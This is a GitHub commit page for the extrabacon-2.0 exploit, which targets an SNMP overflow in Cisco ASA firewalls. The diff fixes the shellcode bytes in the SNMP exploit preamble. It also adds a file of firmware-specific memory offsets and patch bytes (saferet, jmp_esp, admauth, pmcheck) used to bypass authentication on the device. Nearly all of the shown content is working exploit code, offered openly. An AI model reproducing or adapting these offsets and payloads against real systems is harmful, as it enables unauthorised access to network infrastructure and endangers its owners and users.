Skip to content

Commit

Permalink
fixed shellcode
Browse files Browse the repository at this point in the history
  • Loading branch information
@joe-graham
joe-graham committed Dec 3, 2018
1 parent bff18a9 commit f8e7dbd
Show file tree
Hide file tree
Showing 3 changed files with 13 additions and 2 deletions.
5 changes: 3 additions & 2 deletions extrabacon-2.0/extrabacon_2.0.py
100755 → 100644
View file
Original file line number Diff line number Diff line change
Expand Up @@ -222,9 +222,10 @@ def generate_exploit(self):
preamble_snmp += admauth_bytes
preamble_snmp += ".97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197."
#preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197."
preamble_snmp += ".128.195.16.191.11.15.15.15.131.197.4.137.229.131.197."
preamble_snmp += sc.fix_ebp
preamble_snmp += ".204.195"
preamble_snmp += ".195"

if self.params.mode == 'mettle':

Expand Down
Empty file modified extrabacon-2.0/improved/grep-offsets.py
100755 → 100644
View file
Empty file.
10 changes: 10 additions & 0 deletions extrabacon-2.0/improved/shellcode_9_1(6).py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
saferet_offset = "86.227.7.9" # 0x0907e356
jmp_esp_offset = "85.169.10.8" # 0x080aa955
admauth_offset = "224.74.8.8" # 0x08084ae0
admauth_bounds = "0.64.8.8" # 0x08084000
admauth_code = "85.137.229.87" # 0x5589e557
pmcheck_offset = "0.65.133.9" # 0x09854100
pmcheck_bounds = "0.64.133.9" # 0x09854000
pmcheck_code = "85.49.192.137" # 0x5531c089
fix_ebp = "72" # 0x48
#"VERS" => ["85.169.10.8", "86.227.7.9", "72", "0.64.133.9", "0.65.133.9", "85.49.192.137", "0.64.8.8", "224.74.8.8", "85.137.229.87"]

0 comments on commit f8e7dbd

Please sign in to comment.